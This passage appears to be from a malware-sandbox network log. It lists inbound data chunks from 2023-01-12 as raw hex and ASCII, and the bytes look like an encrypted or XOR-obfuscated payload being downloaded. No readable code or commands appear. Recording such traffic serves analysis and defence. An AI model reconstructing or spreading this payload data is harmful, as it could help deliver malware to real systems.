2023-01-12 11:11:41 UTC	48	IN	Data Raw: 72 60 59 7b 75 72 6e 55 79 6e 77 68 0c e6 74 66 73 5e 89 86 95 95 5f 6b 4f 52 75 77 ea 72 64 6d 37 6e 77 79 72 4e 73 66 77 66 11 57 6a 6a 7f 11 56 19 e3 76 75 76 7c 57 7d 6e 77 68 57 72 69 5c 7b 66 62 79 4c 52 60 6b 54 62 7b 4f 98 8d 9b 92 0d 78 73 68 75 5c a4 6f 77 60 5a 79 6a 6a 75 69 2f f1 70 77 71 48 79 6d 73 6e 75 1b 2f 74 75 6c 62 5c 65 79 6a 6a 53 4d 6c 68 71 77 75 0f f7 6c 73 6a 4f 68 71 74 75 64 0c f5 63 79 6e 69 67 6a 3b 3d 71 77 7f 48 70 6d 73 6e 74 1b 54 75 75 60 7c 64 19 ea 6b 6a 71 68 53 0d 11 77 75 78 63 61 ae 62 77 68 71 72 0b bd 74 66 66 51 8f 62 75 6d 88 6a 5b 77 74 62 64 6d 71 6e 4c 68 27 e5 75 6a 77 66 62 79 69 5a 73 6b 0e 62 71 77 75 72 64 6d 0d f0 74 68 75 5c 84 61 77 60 1c e6 69 6a 71 43 a1 65 71 71 55 98 55 5e a5 4e bf 7a 48 a7 2c Data Ascii: r`Y{urnUynwhtfs^_kORuwrdm7nwyrNsfwfWjjVvuv\|W}nwhWri\{fbyLR`kTb{Oxshu\ow`Zyjjui/pwqHymsnu/tulb\eyjjSMlhqwulsjOhqtudcynigj;=qwHpmsntTuu`\|dkjqhSwuxcabwhqrtffQbumj[wtbdmqnLh'ujwfbyiZskbqwurdmthu\aw`ijqCeqqUU^NzH,
2023-01-12 11:11:41 UTC	64	IN	Data Raw: 16 15 97 7c 6a 6c 5f 68 2a 70 74 77 71 5a a5 60 73 68 09 84 75 74 71 4e 5e 6b 62 7f 6e 14 67 6e 54 66 59 b6 78 72 62 13 9f 6a 77 6c 59 5d 78 66 71 75 6f 68 67 0b 06 32 56 62 77 5d 06 2b 64 6d 79 14 77 68 62 44 71 66 66 64 62 79 3e 6a 75 7a 56 1c 6a 72 75 76 4c 88 7e 6e 71 74 4b 54 75 66 77 40 64 07 e8 69 75 6f 7c e3 76 77 73 67 5e 79 73 6e 77 4e 76 6b 7f 5b 52 66 62 79 52 66 75 6b 54 68 49 ac 8a 8d 9b 66 4b 89 88 97 8e 73 6d 5d 64 67 62 79 6d 75 7f 50 c5 62 71 77 4d da 65 6d 73 69 68 63 4a 25 75 66 77 61 7d 76 51 a8 75 6b 54 65 6e 63 35 e2 65 6d 73 6d 4e 4c 71 74 75 60 03 ea 62 79 68 14 de 68 54 66 59 52 7d 72 62 d5 1d 76 4d 6e 71 74 75 40 4f 14 63 79 6a 66 4d 9e ab 9d 8e 71 01 fe 64 6d 71 10 dc 6b 71 70 5d 43 7f 66 64 17 66 52 20 6a 54 62 72 4e 62 72 64 Data Ascii: \|jl_h*ptwqZ`shutqN^kbngnTfYxrbjwlY]xfquohg2Vbw]+dmywhbDqffdby>juzVjruvL~nqtKTufw@diuo\|vwsg^ysnwNvk[RfbyRfukThIfKsm]dgbymuPbqwMemsihcJ%ufwa}vQukTenc5emsmNLqtu`byhhTfYR}rbvMnqtu@OcyjfMqdmqkqp]CfdfR jTbrNbrd
2023-01-12 11:11:41 UTC	80	IN	Data Raw: 5b 47 67 68 77 4c 79 66 77 66 44 41 88 95 8a 94 72 5a 94 88 8a 8d 4e 6d 68 5e 72 68 8c 74 75 66 0f 66 62 68 68 14 d8 6e 54 66 59 5a 65 72 62 70 49 47 77 68 71 52 76 60 04 8b 62 79 6c 7f 4f 4a 54 62 71 51 77 75 17 4e 76 6e 71 72 4b 6d 75 66 77 40 44 7c 53 41 75 6b 54 5a 67 77 75 72 6e 55 a1 91 88 97 7a 4c af 99 88 99 1f 88 6b 6a 71 53 8b 9d 8e 88 77 77 1a c3 76 6e 73 40 40 64 75 60 89 6d 60 79 68 11 84 6a 54 66 0f 76 70 72 60 45 0e 63 77 6e 7d 7c 78 6f 09 70 66 79 6e 42 a4 62 54 64 79 73 63 0c 66 68 73 6a 5f e9 7c 74 73 40 75 64 19 88 6b 6a 71 15 fb 67 71 73 5d 47 74 6d 75 6c 75 6a 0a 85 74 66 73 18 d2 7c 6a 6e 5d 52 44 62 77 0a ac 73 64 69 71 6c 0c 99 70 74 71 18 c6 63 62 7d 42 57 65 6b 52 1f 95 76 75 76 66 6f 08 9f 76 68 75 0a c7 63 77 62 4a 38 7a 6a 73 Data Ascii: [GghwLyfwfDArZNmh^rhtuffbhhnTfYZerbpIGwhqRv`bylOJTbqQwuNvnqrKmufw@D\|SAukTZgwurnUzLkjqSwwvns@@du`m`yhjTfvpr`Ecwn}\|xopfynBbTdyscfhsj_\|ts@udkjqgqs]Gtmulujtfs\|jn]RDbwsdiqlptqcb}BWekRvuvfovhucwbJ8zjs
2023-01-12 11:11:41 UTC	96	IN	Data Raw: 54 62 71 77 55 30 1e 1a b5 10 2c 6b 71 70 5d 83 71 66 64 7b 7d 7f 4f 34 54 62 71 51 55 54 1e 1a b5 10 2c 6b 71 70 5d 83 71 66 64 07 7f 6f 75 6f 7c af 7c 77 73 52 4a 17 04 a8 09 33 72 74 71 4e 92 60 62 7f 69 72 62 51 60 62 71 77 53 52 42 17 04 a8 09 33 72 74 71 4e 92 60 62 7f 14 7f 70 6b 50 4a bc 7a 75 74 1a 7b 76 6e 73 40 a0 79 75 60 04 c6 62 79 60 52 79 6b 54 62 57 4f e9 8d 9b 92 55 56 b0 97 8e 8b 5f 66 64 56 64 79 cc 6b 75 6b c6 62 71 66 76 0c e6 6e 73 6a 5f e9 76 74 73 70 4e 6b 62 79 6a 4c 73 72 69 7f 71 77 75 4a 62 6d 73 6e 7d 50 9f 8b 8a 99 71 5f 0c 79 6a 6a 73 72 6f 5d 71 77 75 4a 0d 6c 73 6e 71 77 60 4f 68 67 77 66 64 66 7d 51 78 6b 54 62 77 68 6d 49 69 6c 73 6e 4f 24 70 74 75 65 03 be 62 79 68 14 fd 6e 54 66 59 ee 7a 72 62 69 0d 30 72 68 75 5c 84 Data Ascii: TbqwU0,kqp]qfd{}O4TbqQUT,kqp]qfdouo\|\|wsRJ3rtqN`birbQ`bqwSRB3rtqN`bpkPJzut{vns@yu`by`RykTbWOUV_fdVdykukbqfvnsj_vtspNkbyjLsriqwuJbmsn}Pq_yjjsro]qwuJlsnqw`Ohgwfdf}QxkTbwhmIilsnO$ptuebyhnTfYzrbi0rhu\
2023-01-12 11:11:41 UTC	112	IN	Data Raw: 71 5f 41 79 6a 6a 77 10 b3 63 71 73 7c 0c 33 6b 73 6a 5f bd 63 74 73 65 04 32 66 79 6c 05 e2 6b 54 68 73 61 08 81 65 6d 77 66 60 30 7d 7c 72 e8 1e 59 ed 87 95 95 77 15 e9 67 71 73 5d 1f 74 6d 75 44 77 68 cb 76 6f 71 4d 79 62 79 6a 4c a5 72 54 62 70 09 1a 71 64 69 5b 5b 70 68 77 0a 53 63 77 62 4a 68 64 6a 73 53 52 62 71 77 53 4a b8 92 8c 91 5d 68 62 44 70 66 3e 66 62 79 e1 6a 75 7a 57 16 fd 77 75 70 1a c6 70 6e 73 40 54 7c 75 60 6a 5c 44 79 6a 6a 53 69 52 75 0f e4 70 72 60 45 b6 61 77 6e 6c 4e 6d 66 77 66 44 7b 6d 14 54 6e 54 66 59 8a 78 72 62 55 7f 6e 77 68 7b 4c a0 99 88 99 69 41 89 95 8a 94 7e 62 71 77 f7 70 7c 7b 4a 7f 77 68 71 52 62 18 37 63 62 7d 42 13 7b 6b 52 5a 77 77 75 72 42 55 99 91 88 97 5b 74 75 66 64 56 67 79 3c 6a 75 6b e4 62 71 66 77 0c 7f Data Ascii: q_Ayjjwcqs\|3ksj_ctse2fylkThsaemwf`0}\|rYwgqs]tmuDwhvoqMybyjLrTbpqdi[[phwScwbJhdjsSRbqwSJ]hbDpf>fbyjuzWwuppns@T\|u`j\DyjjSiRupr`EawnlNmfwfD{mTnTfYxrbUnwh{LiA~bqwp\|{JwhqRb7cb}B{kRZwwurBU[tufdVgy<jukbqfw
2023-01-12 11:11:41 UTC	128	IN	Data Raw: 73 6c 74 1c fd 74 75 64 09 cd 61 79 6e 42 50 63 54 64 1b 04 80 77 64 6b 77 10 08 6e 71 70 5d 13 64 66 64 53 69 14 f7 68 54 66 59 f6 72 72 62 72 79 2e de 68 71 74 76 18 65 63 62 7d 42 ab 78 6b 52 1c 69 72 75 76 4c b4 7e 6e 71 16 68 71 75 62 5f bb 6f 79 6c 72 4f 70 54 62 71 51 72 a2 45 6d 73 6f 09 07 72 74 71 4e 42 61 62 7f 51 4a 75 6b 54 5a 77 77 75 72 6f 55 93 91 88 97 76 a4 5d 66 77 67 1c 16 69 6a 71 43 61 65 71 71 35 55 64 6d 73 6c 74 16 63 71 75 62 5f a7 6f 79 6c 14 6f 6e 54 66 59 96 78 72 62 1e 86 6b 77 6e 75 0a 0a 60 77 62 4a 0c 79 6a 73 41 56 61 0f 65 70 72 60 45 b2 63 77 6e 0f 98 71 66 73 4e 4b 74 6a 6c 06 32 56 62 77 73 0b 0d 62 6d 77 46 02 7b 71 72 5f 64 09 e4 61 79 6e 42 f4 6c 54 64 6e 78 35 36 64 6d 73 6d 09 ea 72 74 71 4e f6 61 62 7f 75 65 35 Data Ascii: slttudaynBPcTdwdkwnqp]dfdSihTfYrrbry.hqtvecb}BxkRiruvL~nqhqub_oylrOpTbqQrEmsortqNBabQJukTZwwuroUv]fwgijqCaeqq5Udmsltcqub_oylonTfYxrbkwnu`wbJyjsAVaepr`EcwnqfsNKtjl2VbwsbmwF{qr_daynBlTdnx56dmsmrtqNabue5
2023-01-12 11:11:41 UTC	144	IN	Data Raw: 15 60 71 73 4a 16 64 6d 73 56 7b 68 71 74 53 5e aa 99 9d 86 4c 52 90 94 ab 9d 73 6f 6d 48 72 6d 73 6e 51 13 30 76 75 62 74 1d 23 7b 6a 6e 48 53 54 62 71 4f 73 72 64 6d 55 56 92 97 8e 8b 77 1d 36 64 62 7d 53 4a 75 6b 54 60 0a 36 77 72 60 7b 71 15 37 6a 71 70 63 65 0c 26 60 79 6e 14 c7 6d 54 66 59 36 61 72 62 37 59 78 5d 7f 5b 61 5f 66 64 56 66 79 23 6a 75 6b 9f 62 71 66 76 70 24 6f 73 6e 77 7f 5b 77 00 a0 77 66 60 60 50 66 75 6b 54 44 77 4d 78 72 64 6d 4b 68 77 68 71 7e 4d 89 88 99 9d 6f 40 68 0e 2a 56 62 75 71 0e 33 66 6d 77 2e 7a 68 71 74 77 60 09 d5 64 79 6e 42 30 7f 54 64 5b 61 5f 72 64 6d 60 5e 72 68 06 74 75 66 71 66 62 68 68 11 35 69 54 66 ff 1e 6d 48 76 6d 73 6e 51 6a 0a 34 77 66 73 e8 5b 23 6a 6a 75 53 52 62 71 77 7f 4a 8d 92 8c 91 71 6a 0a 34 77 Data Ascii: `qsJdmsV{hqtS^LRsomHrmsnQ0vubt#{jnHSTbqOsrdmUVw6db}SJukT`6wr`{q7jqpce&`ynmTfY6arb7Yx][a_fdVfy#jukbqfvp$osnw[wwf``PfukTDwMxrdmKhwhq~Mo@h*Vbuq3fmw.zhqtw`dynB0Td[a_rdm`^rhtufqfbhh5iTfmHvmsnQj4wfs[#jjuSRbqwJqj4w
2023-01-12 11:11:41 UTC	160	IN	Data Raw: 77 66 62 5f 77 42 62 6e 54 64 49 71 75 72 64 4b 4b 81 88 97 8e 5e 75 66 1d 64 7e 6e 50 61 75 6b 54 44 0a 14 77 72 60 55 75 6e 77 68 57 4c 85 99 88 99 48 79 00 68 76 72 6e 65 71 77 75 54 42 55 79 6e 77 68 0c 17 77 66 73 5e 62 79 6a 6a 5f 6b c6 60 68 60 4f 67 64 6d 73 48 09 86 77 74 71 4e 46 73 62 7f e6 4d 75 6b 55 5a 77 77 75 72 42 55 95 91 88 97 5b 74 75 66 74 56 66 79 95 6a 75 6b 54 62 71 77 76 07 41 6d 73 6f 4e 4c 71 74 75 64 74 c3 47 79 6a 6b 6e 51 53 62 71 77 53 54 5c 62 73 6e 77 16 9e 72 75 62 5f 53 77 79 6c 52 75 6b 54 62 5b 74 00 71 64 6d 72 57 53 68 71 74 77 65 d2 65 62 79 6b 77 4f 6c 54 62 71 51 53 4a 6b 6d 73 6e 09 87 77 74 71 4e 42 73 62 7f 52 6a 75 6b 54 48 72 02 54 72 64 6c 4a 4b 77 68 71 76 76 c3 56 66 62 78 07 77 4f 6c 54 62 71 51 53 4a 6b Data Ascii: wfb_wBbnTdIqurdKK^ufd~nPaukTDwr`UunwhWLHyhvrneqwuTBUynwhwfs^byjj_k`h`OgdmsHwtqNFsbMukUZwwurBU[tuftVfyjukTbqwvAmsoNLqtudtGyjknQSbqwST\bsnwrub_SwylRukTb[tqdmrWShqtweebykwOlTbqQSJkmsnwtqNBsbRjukTHrTrdlJKwhqvvVfbxwOlTbqQSJk
2023-01-12 11:11:41 UTC	176	IN	Data Raw: 79 56 d0 97 8e 8b 5f 66 e1 18 38 7a 6a 6e 5d 8a 52 62 77 75 6b 6c 5e 61 73 6e 77 4e 68 5c 31 67 77 60 5a 7f 6a 6a 75 4d 6c 8d 8e 88 8a 58 64 6d 19 6c 62 71 4b 7f 75 66 77 40 19 e9 68 6a 71 53 52 62 71 77 53 4a 94 92 8c 91 5d 68 1b 76 76 7f 4d 61 62 79 6a 4c 53 53 5e 62 71 77 08 e2 66 6d 77 56 77 68 71 74 5f 66 74 56 66 79 04 6a 75 6b 54 62 71 77 77 71 1a ec 70 6e 73 40 0c 73 75 60 6c 5c 7a 79 6a 6a 53 4d 57 1c f3 74 75 76 4c ec 74 6e 71 71 31 35 75 66 77 5e 6d 79 6a 6a 0b e8 57 62 75 5f f0 75 64 6b 4b b5 88 97 8e 76 76 12 83 66 62 7b 14 e3 70 6b 50 4a ec 78 75 74 72 54 74 6e 77 68 57 52 4d 73 77 66 62 07 27 6d 75 6f 7c cf 67 77 73 4a 88 92 8c 91 04 78 71 74 7f 1c 75 4c 62 79 69 5a 73 6b 1a 62 71 77 75 72 64 6d 00 72 71 68 77 51 77 7c 61 5f 51 79 6a 6a 53 Data Ascii: yV_f8zjn]Rbwukl^asnwNh\1gw`ZjjuMlXdmlbqKufw@hjqSRbqwSJ]hvvMabyjLSS^bqwfmwVwhqt_ftVfyjukTbqwwqpns@su`l\zyjjSMWtuvLtnqq15ufw^myjjWbu_udkKvvfb{pkPJxutrTtnwhWRMswfb'muo\|gwsJxqtuLbyiZskbqwurdmrqhwQw\|a_QyjjS
2023-01-12 11:11:41 UTC	192	IN	Data Raw: 74 8b 71 77 75 52 29 6d 73 6e 2e f4 51 e4 75 66 77 5e 26 8d 95 95 8b 67 5d 62 51 63 75 72 64 93 7f 6b 77 f4 51 08 75 66 77 4e c5 7f 6a 6c 4c 4c a0 9d 8e 51 55 34 65 6d 73 56 6b 9c 8e 8b 8b 6a 7e 66 42 7e 6a 6a 75 4b 67 62 71 77 55 7e 64 6d 73 37 eb 48 95 74 75 66 89 68 63 79 52 9f 86 94 ab 9c 7d 7e 75 52 7b 6d 73 6e 89 64 75 74 e9 46 5b 67 62 79 52 8b 86 94 ab 9c 7d 7b 75 52 6d 6d 73 6e 89 64 72 74 e9 46 c6 66 62 79 52 a3 86 94 ab 42 3e 77 75 72 44 4e 73 6e 77 31 8f 7a 71 66 57 34 63 79 6a 52 c5 98 ab 9d 8f 7b 79 72 44 60 73 6e 77 48 f6 74 75 66 57 4b 62 79 6a 33 e9 4b 57 62 71 77 5d da 62 6d 75 54 fb 9b 8e 8b 53 46 38 66 62 79 52 eb 86 94 ab 9c 7d 7e 75 52 61 6d 73 6e 89 64 75 74 e9 46 5a 67 62 79 52 03 86 94 ab 42 62 77 75 72 44 64 73 6e 77 30 8f 7a 70 Data Ascii: tqwuR)msn.Qufw^&g]bQcurdkwQufwNjlLLQU4emsVkj~fB~jjuKgbqwU~dms7HtufhcyR}~uR{msndutF[gbyR}{uRmmsndrtFfbyRB>wurDNsnw1zqfW4cyjR{yrD`snwHtufWKbyj3KWbqw]bmuTSF8fbyR}~uRamsndutFZgbyRBbwurDdsnw0zp
2023-01-12 11:11:41 UTC	208	IN	Data Raw: 77 64 4a 0d 6c 6a 73 41 1e 6c 74 79 75 7c 65 63 71 60 74 66 75 1b 51 61 77 60 48 79 44 ba 47 6a 54 60 59 03 73 72 62 47 70 5e 7d 68 69 74 75 66 77 66 62 79 64 62 7b 6b 5a 63 7f 75 7b 71 6a 69 7d 6b 79 6e 7f 73 1a 4e 70 66 64 53 44 ba 46 6a 54 60 59 03 73 72 62 47 59 60 76 66 71 1b 59 61 77 60 48 79 44 ba 41 6a 54 60 59 03 73 72 62 47 59 60 76 66 71 1b 45 61 77 60 48 79 44 ba 40 6a 54 60 59 03 73 72 62 47 59 60 76 66 71 1b 41 61 77 60 48 79 44 ba 43 6a 54 60 59 03 73 72 62 47 59 60 76 66 71 1b 4d 61 77 60 48 79 44 ba 42 6a 54 60 59 03 73 72 62 47 59 60 76 66 71 1b 49 61 77 60 48 79 44 ba 4d 6a 54 60 59 03 73 72 62 47 59 60 76 66 71 1b 35 61 77 60 48 79 44 ba 4c 6a 54 60 59 03 73 72 62 47 49 60 74 66 71 7a 74 68 75 09 26 7e 6a 6c 5f 6b 7a b2 4b 76 75 70 4c Data Ascii: wdJljsAltyu\|ecq`tfuQaw`HyDGjT`YsrbGp^}hitufwfbydb{kZcu{qji}kynsNpfdSDFjT`YsrbGY`vfqYaw`HyDAjT`YsrbGY`vfqEaw`HyD@jT`YsrbGY`vfqAaw`HyDCjT`YsrbGY`vfqMaw`HyDBjT`YsrbGY`vfqIaw`HyDMjT`YsrbGY`vfq5aw`HyDLjT`YsrbGI`tfqzthu&~jl_kzKvupL
2023-01-12 11:11:41 UTC	224	IN	Data Raw: 75 6e 71 42 5b 7a 74 68 77 09 be 69 6a 6c 5f 6b 7a b2 d1 74 75 70 4c 19 75 6e 71 42 5b 7a 74 68 77 09 82 69 6a 6c 5f 6b 7a b2 d0 74 75 70 4c 19 75 6e 71 42 5b 7a 74 68 77 09 86 69 6a 6c 5f 6b 7a b2 d3 74 75 70 4c 19 75 6e 71 42 4b 7a 76 68 77 68 63 77 68 05 9d 7b 54 64 5b 77 5b a2 c7 6e 73 6c 5f 1c 77 74 73 4c 45 68 60 77 6a 64 74 04 b8 72 71 71 5f 72 64 6d 5d be d3 6b 71 76 5d 12 71 66 64 53 40 64 74 65 54 0d 81 67 75 74 4e 6d 5d be d2 6b 71 76 5d 12 71 66 64 53 40 64 74 65 54 0d 85 67 75 74 4e 6d 5d be d1 6b 71 76 5d 12 71 66 64 53 58 64 77 65 54 6c 70 18 8d 62 64 6b 59 6e 77 68 5f a4 d2 65 77 64 4a 0d 6c 6a 73 41 7e 6c 70 79 75 1d 98 7d 73 68 5d 68 5f a4 dd 65 77 64 4a 0d 6c 6a 73 41 7e 6c 70 79 75 1d 64 7c 73 68 5d 68 5f a4 dc 65 77 64 4a 0d 6c 6a 73 Data Ascii: unqB[zthwijl_kztupLunqB[zthwijl_kztupLunqB[zthwijl_kztupLunqBKzvhwhcwh{Td[w[nsl_wtsLEh`wjdtrqq_rdm]kqv]qfdS@dteTgutNm]kqv]qfdS@dteTgutNm]kqv]qfdSXdweTlpbdkYnwh_ewdJljsA~lpyu}sh]h_ewdJljsA~lpyud\|sh]h_ewdJljs
2023-01-12 11:11:41 UTC	240	IN	Data Raw: 44 62 82 76 75 72 25 6d ef 6c 44 6e 7a 75 65 66 c2 64 62 79 3b 6a dd 69 62 64 72 76 65 72 55 6e 73 6e 36 68 db 76 4f 60 7f 67 72 79 fc 6c 75 6b 05 62 c3 75 37 74 64 6c 63 6e ec 6e 71 74 14 66 c3 64 20 7f 69 4b 65 6b a7 63 71 77 34 72 d2 6f 38 68 74 69 61 74 c0 64 77 66 23 79 d2 68 3b 6d d5 63 61 77 d5 74 65 6d 32 6e c9 6a 2b 72 f5 67 67 66 cd 7f 6a 6a 34 6b ea 60 2a 71 75 72 64 6d b6 68 77 68 30 74 cb 64 2b 60 62 79 7a 6a 81 6d 53 65 30 77 cb 70 38 6b 76 6f 77 68 6b 73 75 66 3e 66 dd 7b 35 6c 75 6b 54 62 5f 70 34 75 25 6d cc 6c 14 6e 72 75 75 66 23 61 62 79 23 6a 92 69 fd 64 74 77 65 72 03 6a 73 6e 2a 68 96 76 d8 60 72 66 72 79 10 6d 75 6b 15 62 96 75 db 74 61 6d 63 6e e7 6f 71 74 34 66 90 64 cd 7f 6f 6b 75 6b f7 65 71 77 3c 72 83 6f c2 68 74 69 71 74 c3 Data Ascii: Dbvur%mlDnzuefdby;jibdrverUnsn6hvO`grylukbu7tdlcnnqtfd iKekcqw4ro8htiatdwf#yh;mcawtem2nj+rggfjj4k`qurdmhwh0td+`byzjmSe0wp8kvowhksuf>f{5lukTb_p4u%mlnruuf#aby#jidtwerjsnhv`rfrymukbutamcnoqt4fdokukeqw<rohtiqt
2023-01-12 11:11:41 UTC	256	IN	Data Raw: 3d 6f 51 79 5e 6e 3a 62 67 62 8d 76 21 7b 57 6d cf 6c 2e 61 42 74 f0 65 29 6f 73 79 99 6b 20 61 55 62 82 76 dd 72 65 6d c6 6c df 68 57 74 20 62 cf 6c 44 79 05 6e cd 61 72 62 84 75 cd 78 42 6d 7a 6a cf 62 57 74 88 64 cf 6c 44 79 2c 68 cd 61 72 62 be 73 cd 78 42 6d 87 6d cf 62 57 74 fb 60 cf 6c 44 79 1e 6e cd 61 72 62 d6 13 cd 78 42 6d dc 0a cf 62 57 74 10 64 cf 6c 44 79 37 68 cd 61 72 62 13 73 cd 78 42 6d 47 6b cf 62 57 74 c2 02 cf 6c 44 79 d5 0e cd 61 72 62 b6 13 cd 78 42 6d 8f 6d cf 62 57 74 bd 63 cf 6c 44 79 7d 69 cd 61 72 62 99 75 cd 78 42 6d e5 6a cf 62 57 74 20 60 cf 6c 44 79 7c 6e cd 61 72 62 be 13 cd 78 42 6d 11 68 cf 62 57 74 c6 63 cf 6c 44 79 e6 6f cd 61 72 62 4d 72 cd 78 42 6d 83 6c cf 62 57 74 a2 02 cf 6c 44 79 22 6e cd 61 72 62 97 73 cd 78 42 Data Ascii: =oQy^n:bgbv!{Wml.aBte)osyk aUbvremlhWt blDynarbuxBmzjbWtdlDy,harbsxBmmbWt`lDynarbxBmbWtdlDy7harbsxBmGkbWtlDyarbxBmmbWtclDy}iarbuxBmjbWt `lDy\|narbxBmhbWtclDyoarbMrxBmlbWtlDy"narbsxB
2023-01-12 11:11:41 UTC	272	IN	Data Raw: 2f 6e 40 68 ac 75 1d a2 77 66 62 79 ec 6a 86 6a 65 63 ac 76 f1 b6 64 6d 73 6e f1 68 82 75 33 66 aa 67 c2 bd 6a 6a 75 6b c5 7a 48 2a e3 72 ba 6c 1b ab 77 68 71 74 e3 66 84 67 63 7b b4 6b 05 ae 54 62 71 77 e3 72 d1 6f 72 6c a9 69 09 b1 75 66 7f 66 f3 79 99 6b bc 61 8a 63 75 b1 75 72 64 6d f5 76 2b 68 91 7e aa 67 c7 a0 62 79 6a 6a f3 6b a7 63 40 76 97 73 a8 ab 73 6e 77 68 97 7d dd 3b b8 66 80 78 82 ac 75 6b 54 62 97 7e c2 2f ab 6d 91 6f 73 af 71 74 75 66 e6 66 91 78 b9 6a 97 6a 08 a5 71 77 75 72 f5 6d c6 6c a4 68 95 75 c1 a1 77 66 62 79 8c 6b dd 36 8a 62 97 76 19 ba 64 6d 73 6e f6 68 82 75 42 66 9b 67 06 b0 6a 6a 75 6b d5 62 c4 75 42 72 88 6c 0f a4 77 68 71 74 b1 67 1b 00 60 72 86 6b dd a1 54 62 71 77 b1 73 1a 0b 71 65 99 69 a9 be 75 66 77 66 84 78 6a 34 42 Data Ascii: /n@huwfbyjjecvdmsnhu3fgjjukzH*rlwhqtfgc{kTbqwrorliuffykacuurdmv+h~gbyjjkc@vssnwh};fxukTb~/mosqtuffxjjqwurmlhuwfbyk6bvdmsnhuBfgjjukbuBrlwhqtg`rkTbqwsqeiufwfxj4B
2023-01-12 11:11:41 UTC	288	IN	Data Raw: 79 6a d1 9f 77 72 6c 6d e0 6e 84 69 e2 57 58 6e b3 8e 60 79 6a 6a e6 6b a7 63 ee 54 5b 7a 0c 84 71 6e 77 68 e2 74 86 67 d8 45 4d 71 66 81 77 6b 54 62 e2 77 86 73 ad 4e 41 66 8b 83 73 74 75 66 f1 7e 3e 79 5d 6a 41 63 70 8e 73 77 75 72 e2 6d 80 6f d1 6c 45 7c e5 8a 75 66 62 79 ec 6a c0 69 f2 66 45 7f 89 9e 66 6d 73 6e f1 70 2d 74 34 66 43 6e 4a 94 68 6a 75 6b d2 62 82 76 44 73 51 65 df 83 75 68 71 74 f3 66 84 67 55 79 5f 62 f1 85 56 62 71 77 f3 72 d1 6f 44 6e 42 60 cd 9a 77 66 77 66 e4 61 36 6a 66 6b 61 6a 6d 98 77 72 64 6d 92 6f 01 06 46 74 43 6e 57 89 60 79 6a 6a 94 6a 22 0c 40 76 43 7a 78 9c 71 6e 77 68 90 75 03 08 7f 42 54 71 52 9b 77 6b 54 62 90 76 f0 1c 53 6d 45 66 37 99 73 74 75 66 96 67 14 17 20 6b 43 63 08 93 73 77 75 72 85 6c 05 00 79 4c 47 7c 91 Data Ascii: yjwrlmniWXn`yjjkcT[zqnwhtgEMqfwkTbwsNAfstuf~>y]jAcpswurmolE\|ufbyjifEfmsnp-t4fCnJhjukbvDsQeuhqtfgUy_bVbqwroDnB`wfwfa6jfkajmwrdmoFtCnW`yjjj"@vCzxqnwhuBTqRwkTbvSmEf7stufg kCcswurlyLG\|
2023-01-12 11:11:41 UTC	304	IN	Data Raw: 74 66 62 79 7c 6a f8 e2 ca 58 04 7d 75 72 64 6d 70 6e 71 70 2d 74 67 64 02 6c da 0c 69 6a 75 6b 44 7a 48 2a e3 72 11 67 73 6e 77 68 72 74 33 66 0c 39 69 4e 1f 60 b1 1e 57 62 71 77 63 72 e9 e4 d8 54 0f 62 71 74 75 66 74 66 64 61 36 6a 67 69 2f 68 a9 02 76 72 64 6d 63 76 4e 35 e7 74 0e 6c 77 66 62 79 69 6a 33 6b 2f 3d 88 5d 0e 78 80 18 70 6e 77 68 67 74 f8 ef cb 5c 1f 73 6a 6a 75 6b 57 62 77 6f 29 72 76 6f 0c 64 83 1d 72 74 75 66 67 7e 5b 24 fc 6a 0a 61 54 62 71 77 76 72 22 6d 08 31 51 42 0e 7e 75 10 74 66 62 79 7c 6a f8 e2 98 58 0e 7d 75 72 64 6d 70 6e 71 70 2d 74 67 64 08 6c 76 0f 69 6a 75 6b 44 7a 48 2a e3 72 1b 67 73 6e 77 68 72 74 33 66 0c 39 bd 43 15 60 55 1d 57 62 71 77 63 72 e9 e4 94 54 f5 62 71 74 75 66 74 66 64 61 36 6a 67 69 d1 68 41 01 76 72 64 Data Ascii: tfby\|jX}urdmpnqp-tgdlijukDzHrgsnwhrt3f9iN`WbqwcrTbqtuftfda6jgi/hvrdmcvN5tlwfbyij3k/=]xpnwhgt\sjjukWbwo)rvodrtufg~[$jaTbqwvr"m1QB~utfby\|jX}urdmpnqp-tgdlvijukDzHrgsnwhrt3f9C`UWbqwcrTbqtuftfda6jgihAvrd
2023-01-12 11:11:41 UTC	320	IN	Data Raw: 63 76 4e 35 e7 74 60 6a 77 66 62 79 69 6a 33 6b 2f 3d c7 5b 60 7e a0 fe 70 6e 77 68 67 74 f8 ef 4a 29 74 75 6a 6a 75 6b 57 62 77 6f 29 72 76 6f 64 62 a3 fb 72 74 75 66 67 7e 5b 24 fc 6a 62 67 54 62 71 77 76 72 22 6d 08 31 3c 27 66 78 95 f5 74 66 62 79 7c 6a f8 e2 0d 2d 6a 7b 75 72 64 6d 70 6e 71 70 2d 74 67 64 68 6a 96 ea 69 6a 75 6b 44 7a 48 2a e3 72 7b 61 73 6e 77 68 72 74 33 66 0c 39 0d 36 75 66 75 ff 57 62 71 77 63 72 e9 e4 04 21 57 64 71 74 75 66 74 66 64 61 36 6a 67 69 75 6e 61 e3 76 72 64 6d 63 76 4e 35 e7 74 54 6a 77 66 62 79 69 6a 33 6b 2f 3d f6 38 54 7e 78 f9 70 6e 77 68 67 74 f8 ef f9 29 40 75 6a 6a 75 6b 57 62 77 6f 29 72 76 6f 50 62 5f fc 72 74 75 66 67 7e 5b 24 fc 6a 56 67 54 62 71 77 76 72 22 6d 08 31 39 69 52 78 41 f2 74 66 62 79 7c 6a f8 Data Ascii: cvN5t`jwfbyij3k/=[`~pnwhgtJ)tujjukWbwo)rvodbrtufg~[$jbgTbqwvr"m1<'fxtfby\|j-j{urdmpnqp-tgdhjijukDzH*r{asnwhrt3f96ufuWbqwcr!Wdqtuftfda6jgiunavrdmcvN5tTjwfbyij3k/=8T~xpnwhgt)@ujjukWbwo)rvoPb_rtufg~[$jVgTbqwvr"m19iRxAtfby\|j
